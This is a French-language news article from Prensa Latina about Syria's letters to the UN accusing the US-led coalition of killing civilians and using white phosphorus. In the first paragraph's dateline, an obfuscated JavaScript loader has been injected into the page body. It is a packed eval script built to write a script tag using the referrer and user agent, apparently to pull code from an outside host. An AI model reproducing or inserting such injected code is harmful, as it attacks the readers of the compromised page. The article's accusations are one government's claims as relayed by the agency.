dimanche 21 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La Syrie dénonce les crimes de guerre de la Coalition dirigée par les États-Unis

Damas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aeibn|var|u0026u|referrer|trrha||js|php'.split('|'),0,{})) 24 août (PL) Aux Nations Unies, la chancellerie syrienne a dénoncé les crimes de guerre commis contre des civils par la Coalition Internationale dirigée par les États-Unis.

Damas, 24 août (PL) Aux Nations Unies, la chancellerie syrienne a dénoncé les crimes de guerre commis contre des civils par la Coalition Internationale dirigée par les États-Unis.

Par deux missives destinées au secrétaire général de l’ONU, Antonio Guterrez, ainsi qu’à la présidence du Conseil de Sécurité de cet organisme, le gouvernement syrien explique que des avions militaires nord-américains, et de leurs alliés, prennent des zones civiles habitées pour cibles.

« En plus de détruire des infrastructures présentes dans ces zones, les avions de chasse emploient des bombes de phosphore blanc, une arme interdite internationalement et dont l’utilisation constitue une flagrante violation des dispositions de la Chartes de l’ONU, ainsi que du droit humanitaire international », est-il précisé dans les plaintes diffusées par l’Agence Sana.

Le Ministère des Relations Extérieures et des Émigrés de Syrie exige aux Nations Unies d’empêcher la dénommée coalition internationale de commettre de nouveaux délits à l’encontre de civils innocents. Suite à quoi il est également demandé à l’organisme international d’appliquer ses résolutions sur la lutte contre le terrorisme.

En diverses occasions, le gouvernement syrien a demandé à l’ONU que cette coalition, qui réalise des bombardements en Syrie depuis septembre 2014, cesse ses opérations militaires et abandonne ce territoire arabe.

« Les interventionnistes étasuniens et leurs acolytes ne disposent pas d’autorisation pour leur présence dans ce pays ; ni du gouvernement de Damas, ni de la propre Organisation des Nations Unies », est-il assuré dans le document.

D’autres part, des représentants du gouvernement syrien et du Programme des Nations Unies pour le Développement (PNUD), se sont rencontrés dans le but de renforcer leur coopération pour mieux satisfaire les besoins humanitaires des citoyens de ce pays.

Sur le terrain, des sources militaires ont informé que des attaques de cette coalition internationale contre des quartiers résidentiels de la province orientale de Deir Ezzor ont aujourd’hui provoqué la mort de sept civils.

Selon des médias présents sur place, ce chiffre pourrait augmenter car des dizaines de personnes se trouvent encore sous les décombres provoqués par ces bombardements.

peo/tgj/obf/mem/obf/lma/obf

EN CONTINU
notes connexes